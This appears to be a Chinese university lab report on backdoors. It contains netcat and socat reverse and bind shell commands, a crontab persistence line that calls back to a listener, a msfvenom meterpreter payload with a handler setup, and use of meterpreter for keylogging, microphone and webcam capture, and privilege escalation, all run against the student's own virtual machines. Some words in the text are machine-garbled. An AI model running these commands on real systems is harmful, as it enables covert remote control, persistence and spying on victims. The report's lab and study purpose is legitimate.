Exp2 后门原理与实践 20164309

 

准备工做:

使用 ipconfig 查看win7虚拟机IP地址为:192.168.236.130linux

使用 ipconfig 查看linux虚拟机IP地址为:192.168.236.131web

 

 

实验内容

 

1、使用ncnetcat远程获取shell

1win得到Linux shell

1windows打开监听

进入文件夹shell

cd netcat

开始监听windows

ncat.exe -l -p 4309

这里的 -l 是监听模式,-p是选择监听的端口。安全


2. Linux反弹链接win

nc 192.168.236.130 4309 -e /bin/sh

 

3.windows下得到一个linux shell,可运行任何cmd指令,如ls

2 Linux得到Win Shell

1.Linux运行监听指令

nc -l -p 4309

2.Windows反弹链接Linux

ncat.exe -e cmd.exe 192.168.236.131 4309

 

3.Linux下看到Windows的命令提示

能够发现,linux端得到了win的shelltcp

 

3 nc传输数据

1.win端对4309端口进行监听

ncat.exe -l -p 4309

2.linux端链接到win4309端口

nc 192.168.236.130 4309

3.传输通道创建,能够传输文字信息了

 

2、使用netcat获取主机操做Shellcron启动

1.在Win端进行监听

ncat.exe -l -p 4309

 2.使用crontab指令增长一条定时任务

crontab-e

crontab指令能够用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供以后读取和执行,"-e"表示编辑工具

3.添加指令令其定时反向链接

在最后添加一条定时链接win端口的指令学习

56 * * * * /bin/netcat 192.168.236.130 4309 -e /bin/sh

表示每小时的第56分钟链接IP为192.168.236.130的主机(即虚拟机win7端)的4309端口,具体时间能够自行设定,我这里为了方便选择了两分钟以后的时间网站



稍等片刻,发现成功获取win端的shellui





3、使用socat获取主机操做Shell, 任务计划启动

1.新建一个能运行socat的任务

 ①搜索任务计划程序,点击进入

 

②点击右侧操做里的建立任务,并命名为“20164309 socat

③新建触发器,设定为在锁定时触发

 

③新建操做,选定目标程序路径,而且添加参数:

tcp-listen:4309 exec:cmd.exe,pty,stderr

这个命令能够将cmd.exe绑定到4309端口,而且将cmd.exe的stderr重定向到stdout上

 

 咱们能够看到,建立任务成功

2.触发任务,使其运行

使用Windows+l锁定主机后,再解锁,发现程序已经运行

3.获取shell

socat - tcp:192.168.236.130:4309

这里的第一个参数-表明标准的输入输出,第二个流链接到Windows主机的4309端口。

在实现的时候我出现了一个问题:在tcp后多打了一个空格,卡了好久,不过好在成功了,你们引觉得戒。

修改后发现已经成功获取cmd Shell

4、使用MSF meterpreter生成可执行文件,利用ncatsocat传送到主机并运行获取主机Shell

1.生成后门

在linux端使用msfvenom工具,生成后门:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.194 LPORT=4309 -f exe > 20164309_backdoor.exe 192.168.236.131

其中-p 使用的payload,为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.LHOST是反弹回连的IP,即攻击机linuxIP地址,LPORT是回连的端口,-f是生成文件的类型, >输出到哪一个文件

因为一开始没有充分理解这里的ip地址的意义,我使用了被攻击win端的地址,致使在以后使用后门的时候屡屡失败。通过理解我发现这里的ip是被攻击主机须要链接的地址,即为攻击机linux端的地址。

2. 使用nc进行文件传输

须要在win端关闭杀软和防火墙的条件下进行

①在win端进行监听

ncat.exe -lv 4309 > 20164309_backdoor.exe

其中-lv表示能够观察到链接状态

 

 ②在linux端传输文件

nc 192.168.236.130 4309 < 20164309_backdoor.exe发送文件

在win端命令行显示传输成功

的确传输成功了

 3.在msf端控制台设置反弹回连

输入

msfconsole

进入控制台(以后因为实验多次失败我进入了这个界面不知道多少次。。。幸好这里有一个小彩蛋,每次进入的界面大都和以前不同,也算是苦中做乐了吧)

use exploit/multi/handler

设置payload

set payload windows/meterpreter/reverse_tcp

使用生成后门程序时相同的payload

set LHOST 192.168.236.131

这里须要与生成后门程序的主机IP相同

set LPORT 4309

须要使用相同的端口

show options

显示选项

exploit

进行监听

多次尝试,在纠正了刚刚说的那个错误后在win端运行了正确的后门


发现能够调用win端shell

5、使用MSF meterpreter(或其余软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

还有不少功能可使用,咱们一个一个试试吧

1.使用screenshot进行截屏,截屏得文件nQebvnBz.jpeg

2.使用keyscan_start指令开始记录下击键的过程,乱输一通试试:

成功记录

3.使用record_mic指令截获一段音频,文件名为qbucCKSm.wav

4.或者使用webcam_snap进行拍。。等等,为何失败了

发现没法进行拍照,看看排除一下缘由,发现:

貌似虚拟机没法调用内置摄像头

上网查查有什么解决的方法


???如今去买一个外置摄像头也来不及了,忍痛割爱在本身主机上试试吧。。。

 循序渐进地进行试验:

查得ip地址为:192.168.6.194

传输后门

linux准备就绪后运行后门

发现能够拍照了,那多拍几张选一张看得出生理特征的(好比眼镜(???)),就决定是你了:hAcbeMwj,jpeg

 

5.继续实验尝试提权

输入getuid查看权限分组

输入getsystem进行提权

发如今提权时遇到了一些问题,没法提权

有多是win10帐号是管理员权限?那我再在win7虚拟机上尝试一下普通用户

仍是失败

再试试win7的管理员帐号

意想不到的是居然成功了,但愿大神们能帮忙解释一下原理


 

基础问题解答:

(1)   例举你能想到的一个后门进入到你系统中的可能方式?

记得好久之前的三一五晚会曝光了一些手机APP擅自添加后门,致使巨大的财产损失的案例,那时候智能手机方兴未艾,人们的安全意识也相对薄弱,可是如今这样的事情还真实地发生在咱们身边;还有一些钓鱼网站会诱导咱们点击下载一些后门程序,一旦程序运行就成了人为刀俎我为鱼肉的情形了。

(2)   例举你知道的后门如何启动起来(winlinux)的方式?

后门可能会假装成正常的程序或软件,诱导用户使用,来获取你的权限。

(3)   Meterpreter有哪些给你映像深入的功能?

远程拍照功能。在以前bm管理概论的课程中我阅读了《无处可藏》这本书,有一段令我印象深入的细节是斯诺登笔记本电脑的摄像头用胶带封住了,当时我还认为杞人忧天了,可是没有想到这种技术门槛这么低。

(4)如何发现本身有系统有没有被安装后门?

对于咱们来讲最好的办法就是常常性的杀毒、及时更新系统、病毒库以查找后门。在实验中我还发如今进行远程照相的时候我摄像头旁边的呼吸灯闪了一下,若是现实生活中遇到这种状况务必要注意了

 

实验心得:

此次实验最大的收获就是明白了细节决定成败。因为本身的粗心马虎,此次实验几乎花了我两个晚上才完成,每一步都要遇到一些或多或少地小问题。甚至一开始为了避免注册码云帐号没有使用老师的ncet而去网上下载了一个,致使在传输文件的时候出现问题;还有输入socat命令的时候多打了一个空格,也致使没法顺利调用shell;甚至在写实验报告的时候发现缺乏关键的截图而回过头来临时作临时截的。在从此的实验和学习乃至工做中,我必定要戒骄戒躁,时刻关注细节,才能高质量地完成任务。

相关文章
相关标签/搜索